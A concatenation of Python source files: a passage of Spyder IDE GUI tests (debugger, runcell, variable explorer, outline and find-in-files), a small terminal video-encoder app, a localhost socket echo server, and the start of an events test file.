debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
for key in ['!n', '!n', '!s', '!n', '!n']:
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(shell._control, key)
qtbot.keyClick(shell._control, Qt.Key_Enter)
assert shell.get_value('abba') == 27
code_editor.setFocus()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert "runcell" in shell._control.toPlainText()
# Make sure the local variables are detected
assert "abba 27" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [False, True])
def test_runcell_cache(main_window, qtbot, debug):
"""Test the runcell command cache."""
# Write code with a cell to a file
code = ("import time\n"
"time.sleep(.5)\n"
"# %%\n"
"print('Done')\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
if debug:
# Start debugging
with qtbot.waitSignal(shell.executed):
shell.execute("%debug print()")
# Run the two cells
code_editor.setFocus()
code_editor.move_cursor(0)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(100)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.waitUntil(lambda: "Done" in shell._control.toPlainText())
# --- Path manager
# ----------------------------------------------------------------------------
@pytest.mark.slow
def test_path_manager_updates_clients(qtbot, main_window, tmpdir):
"""Check that on path manager updates, consoles correctly update."""
main_window.show_path_manager()
dlg = main_window._path_manager
test_folder = 'foo-spam-bar-123'
folder = str(tmpdir.mkdir(test_folder))
dlg.add_path(folder)
qtbot.waitUntil(lambda: dlg.button_ok.isEnabled(), timeout=EVAL_TIMEOUT)
with qtbot.waitSignal(dlg.sig_path_changed, timeout=EVAL_TIMEOUT):
dlg.button_ok.animateClick()
cmd = 'import sys;print(sys.path)'
# Check Spyder is updated
main_window.console.execute_lines(cmd)
syspath = main_window.console.get_sys_path()
assert folder in syspath
# Check clients are updated
count = 0
for client in main_window.ipyconsole.get_clients():
shell = client.shellwidget
if shell is not None:
syspath = shell.execute(cmd)
control = shell._control
# `shell.executed` signal was not working so we use waitUntil
qtbot.waitUntil(lambda: 'In [2]:' in control.toPlainText(),
timeout=EVAL_TIMEOUT)
assert test_folder in control.toPlainText()
count += 1
assert count >= 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It times out on macOS and Windows")
def test_pdb_key_leak(main_window, qtbot, tmpdir):
"""
Check that pdb notify spyder doesn't call
QApplication.processEvents(). If it does there might be keystoke leakage.
see #10834
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Replace QApplication.processEvents to make sure it is not called
super_processEvents = QApplication.processEvents
def processEvents():
processEvents.called = True
return super_processEvents()
processEvents.called = False
try:
QApplication.processEvents = processEvents
# Debug and open both files
with qtbot.waitSignal(shell.executed):
shell.execute('%debug')
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!u')
qtbot.keyClick(control, Qt.Key_Enter)
# Wait until both files are open
qtbot.waitUntil(
lambda: osp.normpath(str(test_file)) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
qtbot.waitUntil(
lambda: str(test_file2) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
# Make sure the events are not processed.
assert not processEvents.called
finally:
QApplication.processEvents = super_processEvents
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It times out on macOS")
@pytest.mark.parametrize(
"where", [True, False])
def test_pdb_step(main_window, qtbot, tmpdir, where):
"""
Check that pdb notify Spyder only moves when a new line is reached.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Debug and enter first file
with qtbot.waitSignal(shell.executed):
shell.execute('%debug')
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file)))
# Move to another file
main_window.editor.new()
qtbot.wait(100)
assert main_window.editor.get_current_editor().filename != str(test_file)
current_filename = main_window.editor.get_current_editor().filename
# Run a random command, make sure we don't move
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!a')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
assert current_filename == main_window.editor.get_current_editor().filename
# Go up and enter second file
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!u')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2)))
# Go back to first file
editor_stack = main_window.editor.get_current_editorstack()
index = editor_stack.has_filename(str(test_file))
assert index is not None
editor_stack.set_stack_index(index)
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
if where:
# go back to the second file with where
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!w')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Make sure we moved
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2))
else:
# Stay at the same place
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!a')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Make sure we didn't move
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Fails sometimes on macOS")
def test_runcell_after_restart(main_window, qtbot):
"""Test runcell after a kernel restart."""
# Write code to a file
code = "print('test_runcell_after_restart')"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# call runcell
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(
lambda: "test_runcell_after_restart" in shell._control.toPlainText())
# Make sure no errors are shown
assert "error" not in shell._control.toPlainText().lower()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="It fails sometimes on Linux")
@pytest.mark.parametrize(
"ipython", [True, False])
@pytest.mark.parametrize(
"test_cell_magic", [True, False])
def test_ipython_magic(main_window, qtbot, tmpdir, ipython, test_cell_magic):
"""Test the runcell command with cell magic."""
# Write code with a cell to a file
write_file = tmpdir.mkdir("foo").join("bar.txt")
assert not osp.exists(to_text_string(write_file))
if test_cell_magic:
code = "\n\n%%writefile " + to_text_string(write_file) + "\ntest\n"
else:
code = "\n\n%debug print()"
if ipython:
fn = "cell-test.ipy"
else:
fn = "cell-test.py"
p = tmpdir.join(fn)
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(0, r'{}')".format(to_text_string(p)))
control = main_window.ipyconsole.get_focus_widget()
error_text = 'save this file with the .ipy extension'
try:
if ipython:
if test_cell_magic:
qtbot.waitUntil(
lambda: 'Writing' in control.toPlainText())
# Verify that the code was executed
assert osp.exists(to_text_string(write_file))
else:
qtbot.waitSignal(shell.executed)
assert error_text not in control.toPlainText()
else:
qtbot.waitUntil(lambda: error_text in control.toPlainText())
finally:
if osp.exists(to_text_string(write_file)):
os.remove(to_text_string(write_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_running_namespace(main_window, qtbot, tmpdir):
"""
Test that the running namespace is correctly sent when debugging in a
new namespace.
"""
code = ("def test(a):\n print('a:',a)\na = 10\ntest(5)")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=2)
# Write b in the namespace
with qtbot.waitSignal(shell.executed):
shell.execute('b = 10')
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['b']['view'] == '10'
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# b should not be there (running namespace) and the local a should be 5
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data and
nsb.editor.source_model._data['a']['view'] == '5',
timeout=3000)
assert 'b' not in nsb.editor.source_model._data
assert nsb.editor.source_model._data['a']['view'] == '5'
qtbot.waitUntil(shell.is_waiting_pdb_input)
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!c')
# At the end, b should be back and a should be 10
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['a']['view'] == '10'
assert nsb.editor.source_model._data['b']['view'] == '10'
@pytest.mark.slow
@flaky(max_runs=3)
def test_post_mortem(main_window, qtbot, tmpdir):
"""Test post mortem works"""
# Check we can use custom complete for pdb
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_focus_widget()
test_file = tmpdir.join('test.py')
test_file.write('raise RuntimeError\n')
with qtbot.waitSignal(shell.executed):
shell.execute(
"runfile(" + repr(str(test_file)) + ", post_mortem=True)")
assert "IPdb [" in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_unsaved_file_multiprocessing(main_window, qtbot):
"""Test that we can run an unsaved file with multiprocessing."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"import multiprocessing\n"
"import traceback\n"
'if __name__ is "__main__":\n'
" p = multiprocessing.Process(target=traceback.print_exc)\n"
" p.start()\n"
" p.join()\n"
)
# This code should run even on windows
# Start running
qtbot.mouseClick(run_button, Qt.LeftButton)
# Because multiprocessing is behaving strangly on windows, only some
# situations will work. This is one of these situations so it shouldn't
# be broken.
if os.name == 'nt':
qtbot.waitUntil(
lambda: "Warning: multiprocessing" in shell._control.toPlainText())
else:
# There is no exception, so the exception is None
qtbot.waitUntil(
lambda: 'None' in shell._control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Fails sometimes on macOS")
def test_varexp_cleared_after_kernel_restart(main_window, qtbot):
"""
Test that the variable explorer is cleared after a kernel restart.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a variable
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_reset(main_window, qtbot):
"""
Test that the variable explorer is cleared after triggering a
reset in the IPython console and variable explorer panes.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a variable
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Trigger a reset in the variable explorer
nsb.reset_namespace()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
# Create the variable again
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Trigger a reset in the console
shell.ipyclient.reset_namespace()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_immediate_debug(main_window, qtbot):
"""
Check if we can enter debugging immediately
"""
shell = main_window.ipyconsole.get_current_shellwidget()
with qtbot.waitSignal(shell.executed, timeout=SHELL_TIMEOUT):
shell.execute("%debug print()")
@pytest.mark.slow
@flaky(max_runs=3)
def test_local_namespace(main_window, qtbot, tmpdir):
"""
Test that the local namespace is not reset.
This can happen if `frame.f_locals` is called on the current frame, as this
has the side effect of discarding the pdb locals.
"""
code = ("""
def hello():
test = 1
print('test ==', test)
hello()
""")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=4)
nsb = main_window.variableexplorer.current_widget()
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Check `test` has a value of 1
# Here we use "waitUntil" because `shell.executed` is emitted twice
# One at the beginning of the file, and once at the breakpoint
qtbot.waitUntil(lambda: 'test' in nsb.editor.source_model._data and
nsb.editor.source_model._data['test']['view'] == '1',
timeout=3000)
# change value of test
with qtbot.waitSignal(shell.executed):
shell.execute("test = 1 + 1")
# check value of test
with qtbot.waitSignal(shell.executed):
shell.execute("print('test =', test)")
assert "test = 2" in shell._control.toPlainText()
# change value of test
with qtbot.waitSignal(shell.executed):
shell.execute("test = 1 + 1 + 1")
# do next
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!next")
assert "test == 3" in shell._control.toPlainText()
# Check the namespace browser is updated
assert ('test' in nsb.editor.source_model._data and
nsb.editor.source_model._data['test']['view'] == '3')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
def test_ordering_lsp_requests_at_startup(main_window, qtbot):
"""
Test the ordering of requests we send to the LSP at startup when a
project was left open during the previous session.
This is a regression test for spyder-ide/spyder#13351.
"""
# Wait until the LSP server is up.
code_editor = main_window.editor.get_current_editor()
qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000)
# Wait until the initial requests are sent to the server.
lsp = main_window.completions.get_provider('lsp')
python_client = lsp.clients['python']
qtbot.wait(5000)
expected_requests = [
'initialize',
'initialized',
'workspace/didChangeConfiguration',
'workspace/didChangeWorkspaceFolders',
'textDocument/didOpen',
]
skip_intermediate = {
'initialized': {'workspace/didChangeConfiguration'}
}
lsp_requests = python_client['instance']._requests
start_idx = lsp_requests.index((0, 'initialize'))
request_order = []
expected_iter = iter(expected_requests)
current_expected = next(expected_iter)
for i in range(start_idx, len(lsp_requests)):
if current_expected is None:
break
_, req_type = lsp_requests[i]
if req_type == current_expected:
request_order.append(req_type)
current_expected = next(expected_iter, None)
else:
skip_set = skip_intermediate.get(current_expected, set({}))
if req_type in skip_set:
continue
else:
assert req_type == current_expected
assert request_order == expected_requests
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('main', 'show_tour_message', 2)}],
indirect=True)
def test_tour_message(main_window, qtbot):
"""Test that the tour message displays and sends users to the tour."""
# Wait until window setup is finished, which is when the message appears
qtbot.waitSignal(main_window.sig_setup_finished, timeout=30000)
# Check that tour is shown automatically and manually show it
assert CONF.get('main', 'show_tour_message')
main_window.show_tour_message(force=True)
# Wait for the message to appear
qtbot.waitUntil(lambda: bool(main_window.tour_dialog), timeout=5000)
qtbot.waitUntil(lambda: main_window.tour_dialog.isVisible(), timeout=2000)
# Check that clicking dismiss hides the dialog and disables it
qtbot.mouseClick(main_window.tour_dialog.dismiss_button, Qt.LeftButton)
qtbot.waitUntil(lambda: not main_window.tour_dialog.isVisible(),
timeout=2000)
assert not CONF.get('main', 'show_tour_message')
# Confirm that calling show_tour_message() normally doesn't show it again
main_window.show_tour_message()
qtbot.wait(2000)
assert not main_window.tour_dialog.isVisible()
# Ensure that it opens again with force=True
main_window.show_tour_message(force=True)
qtbot.waitUntil(lambda: main_window.tour_dialog.isVisible(), timeout=5000)
# Run the tour and confirm it's running and the dialog is closed
qtbot.mouseClick(main_window.tour_dialog.launch_tour_button, Qt.LeftButton)
qtbot.waitUntil(lambda: main_window.tour.is_running, timeout=9000)
assert not main_window.tour_dialog.isVisible()
assert not CONF.get('main', 'show_tour_message')
# Close the tour
main_window.tour.close_tour()
qtbot.waitUntil(lambda: not main_window.tour.is_running, timeout=9000)
main_window.tour_dialog.hide()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_update_outline(main_window, qtbot, tmpdir):
"""
Test that files in the Outline pane are updated at startup and
after switching projects.
"""
# Show outline explorer
outline_explorer = main_window.outlineexplorer
outline_explorer.toggle_view_action.setChecked(True)
# Get Python editor trees
treewidget = outline_explorer.get_widget().treewidget
editors_py = [
editor for editor in treewidget.editor_ids.keys()
if editor.get_language() == 'Python'
]
# Wait a bit for trees to be filled
qtbot.wait(5000)
# Assert all Python editors are filled
assert all(
[
len(treewidget.editor_tree_cache[editor.get_id()]) > 0
for editor in editors_py
]
)
# Split editor
editorstack = main_window.editor.get_current_editorstack()
editorstack.sig_split_vertically.emit()
qtbot.wait(1000)
# Select file with no outline in split editorstack
editorstack = main_window.editor.get_current_editorstack()
editorstack.set_stack_index(2)
editor = editorstack.get_current_editor()
assert osp.splitext(editor.filename)[1] == '.txt'
assert editor.is_cloned
# Assert tree is empty
editor_tree = treewidget.current_editor
tree = treewidget.editor_tree_cache[editor_tree.get_id()]
assert len(tree) == 0
# Assert spinner is not shown
assert not outline_explorer.get_widget()._spinner.isSpinning()
# Set one file as session without projects
prev_file = tmpdir.join("foo.py")
prev_file.write("def zz(x):\n"
" return x**2\n")
CONF.set('editor', 'filenames', [str(prev_file)])
# Close project to open that file automatically
main_window.projects.close_project()
# Wait a bit for its tree to be filled
qtbot.wait(1000)
# Assert the editor was filled
editor = list(treewidget.editor_ids.keys())[0]
assert len(treewidget.editor_tree_cache[editor.get_id()]) > 0
# Remove test file from session
CONF.set('editor', 'filenames', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_prevent_closing(main_window, qtbot):
"""
Check we can bypass prevent closing.
"""
code = "print(1 + 6)\nprint(1 + 6)\n"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=1)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
CONF.set('ipython_console', 'pdb_prevent_closing', False)
# Check we can close a file we debug if the option is disabled
assert main_window.editor.get_current_editorstack().close_file()
CONF.set('ipython_console', 'pdb_prevent_closing', True)
# Check we are still debugging
assert shell.is_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
def test_continue_first_line(main_window, qtbot):
"""
Check we can bypass prevent closing.
"""
code = "print('a =', 1 + 6)\nprint('b =', 1 + 8)\n"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
CONF.set('ipython_console', 'pdb_stop_first_line', False)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# The debugging should finish
qtbot.waitUntil(lambda: not shell.is_debugging())
CONF.set('ipython_console', 'pdb_stop_first_line', True)
# Check everything was executed
qtbot.waitUntil(lambda: "a = 7" in shell._control.toPlainText())
assert "b = 9" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_outline_no_init(main_window, qtbot):
# Open file in one of our directories without an __init__ file
spy_dir = osp.dirname(get_module_path('spyder'))
main_window.editor.load(osp.join(spy_dir, 'tools', 'rm_whitespace.py'))
# Show outline explorer
outline_explorer = main_window.outlineexplorer
outline_explorer.toggle_view_action.setChecked(True)
# Wait a bit for trees to be filled
qtbot.wait(5000)
# Get tree length
treewidget = outline_explorer.get_widget().treewidget
editor_id = list(treewidget.editor_ids.values())[1]
# Assert symbols in the file are detected and shown
assert len(treewidget.editor_tree_cache[editor_id]) > 0
@pytest.mark.slow
@flaky(max_runs=3)
def test_pdb_without_comm(main_window, qtbot):
"""Check if pdb works without comm."""
ipyconsole = main_window.ipyconsole
shell = ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = ipyconsole.get_focus_widget()
with qtbot.waitSignal(shell.executed):
shell.execute("get_ipython().kernel.frontend_comm.close()")
shell.execute("%debug print()")
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClicks(control, "print('Two: ' + str(1+1))")
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
assert "Two: 2" in control.toPlainText()
# Press step button and expect a sig_pdb_step signal
with qtbot.waitSignal(shell.sig_pdb_step):
main_window.editor.debug_command("step")
# Stop debugging and expect an executed signal
with qtbot.waitSignal(shell.executed):
main_window.editor.stop_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
def test_print_comms(main_window, qtbot):
"""Test warning printed when comms print."""
# Write code with a cell to a file
code = ("class Test:\n @property\n def shape(self):"
"\n print((10,))")
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_focus_widget()
nsb = main_window.variableexplorer.current_widget()
# Create some output from spyder call
with qtbot.waitSignal(shell.executed):
shell.execute(code)
assert nsb.editor.source_model.rowCount() == 0
with qtbot.waitSignal(shell.executed):
shell.execute("a = Test()")
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
# Make sure the warning is printed
assert ("Output from spyder call 'get_namespace_view':"
in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="UTF8 on Windows")
def test_goto_find(main_window, qtbot, tmpdir):
"""Test find goes to the right place."""
# Use UTF8 only character to make sure positions are respected
code = "we Weee wee\nWe\n🚫 wee"
match_positions = [
(0, 2),
(3, 7),
(8, 11),
(12, 14),
(18, 21)
]
subdir = tmpdir.mkdir("find-sub")
p = subdir.join("find-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
code_editor = main_window.editor.get_focus_widget()
main_window.explorer.chdir(str(subdir))
main_window.findinfiles.switch_to_plugin()
findinfiles = main_window.findinfiles.get_widget()
findinfiles.set_search_text("we+")
findinfiles.search_regexp_action.setChecked(True)
findinfiles.case_action.setChecked(False)
with qtbot.waitSignal(findinfiles.sig_finished, timeout=SHELL_TIMEOUT):
findinfiles.find()
results = findinfiles.result_browser.data
assert len(results) == 5
assert len(findinfiles.result_browser.files) == 1
file_item = list(findinfiles.result_browser.files.values())[0]
assert file_item.childCount() == 5
for i in range(5):
item = file_item.child(i)
findinfiles.result_browser.setCurrentItem(item)
findinfiles.result_browser.activated(item)
cursor = code_editor.textCursor()
position = (cursor.selectionStart(), cursor.selectionEnd())
assert position == match_positions[i]
if __name__ == "__main__":
pytest.main()
|
main.py | import time
import npyscreen
from encode import encode_c480, encode_c720
from multiprocessing import Process, Queue, Manager
PROCESS_NUM = 10
def encode(task_q, messages, id):
while True:
messages[id] = 'waiting task'
filename = task_q.get()
parsed = filename.split('.')
fout_480p = "".join(parsed[:-1]) + "_480p." + parsed[-1]
fout_720p = "".join(parsed[:-1]) + "_720p." + parsed[-1]
messages[id] = 'recv file to encode {}'.format(filename)
time.sleep(0.5)
messages[id] = 'converting file({}) to 480p...'.format(filename)
succeed, output = encode_c480(filename, fout_480p)
if not succeed:
messages[id] = 'convert 480p failed.'
time.sleep(5)
continue
time.sleep(1)
messages[id] = 'converting file({}) to 720p...'.format(filename)
succeed, output = encode_c720(filename, fout_720p)
if not succeed:
messages[id] = 'convert 720p failed.'
time.sleep(5)
continue
messages[id] = 'Succeess'
time.sleep(1)
class VideoEncoderApp(npyscreen.NPSAppManaged):
def onStart(self):
self.keypress_timeout_default = 1
self.manager = Manager()
self.messages = self.manager.dict()
self.task_q = Queue()
self.msg_q = Queue()
self.pool = []
self.addForm("MAIN", MainForm, name="Video Encoder")
for i in range(PROCESS_NUM):
p = Process(target=encode, args=(self.task_q, self.messages, i))
p.start()
self.pool.append(p)
def onCleanExit(self):
npyscreen.notify_wait("Goodbye!")
# terminate all the processes
for process in self.pool:
process.terminate()
time.sleep(0.1)
class MainForm(npyscreen.ActionForm):
def create(self):
self.keypress_timeout_default = 1
self.process_fields = []
self.fn = self.add(npyscreen.TitleFilenameCombo, name="filename: ")
self.status = self.add(npyscreen.MultiLineEdit, value="Welcome! Please choose mp4 or mov file to encode\n", max_height=10, rely=9, editable=False)
self.stdout = None
for i in range(PROCESS_NUM):
process_name = "process {}:".format(i)
self.process_fields.append(self.add(npyscreen.TitleText, name=process_name, value="initializing", editable=False))
def while_waiting(self):
for i in range(PROCESS_NUM):
if i in self.parentApp.messages:
self.process_fields[i].value = self.parentApp.messages[i]
self.process_fields[i].display()
if self.stdout is not None:
self.status.value += self.stdout
self.stdout = None
self.status.display()
def on_cancel(self):
self.parentApp.setNextForm(None)
def on_ok(self):
filename = self.fn.value
parsed = filename.split('.')
if len(parsed) > 1:
suffix = parsed[-1]
if suffix == 'mp4'or suffix == 'mov':
self.parentApp.task_q.put(filename)
self.stdout = "add file({}) to task queue(current size:{})\n".format(filename, self.parentApp.task_q.qsize())
else:
self.stdout = "invalid filename({}). mp4 or mov file required.\n".format(filename)
else:
self.stdout = "invalid filename({}). mp4 or mov file required.\n".format(filename)
if __name__ == "__main__":
app = VideoEncoderApp()
app.run() |
socket_server.py | import socket
import threading
def process_request(conn, addr):
print("connected client:", addr)
with conn:
while True:
data = conn.recv(1024)
if not data:
break
print(data.decode("utf8"))
if __name__ == "__main__":
with socket.socket() as sock:
sock.bind(('127.0.0.1', 10001))
sock.listen(socket.SOMAXCONN)
while True:
conn, addr = sock.accept()
th = threading.Thread(target=process_request, args=(conn, addr))
th.start()
|
test_events.py | """Tests for events.py."""
import collections.abc
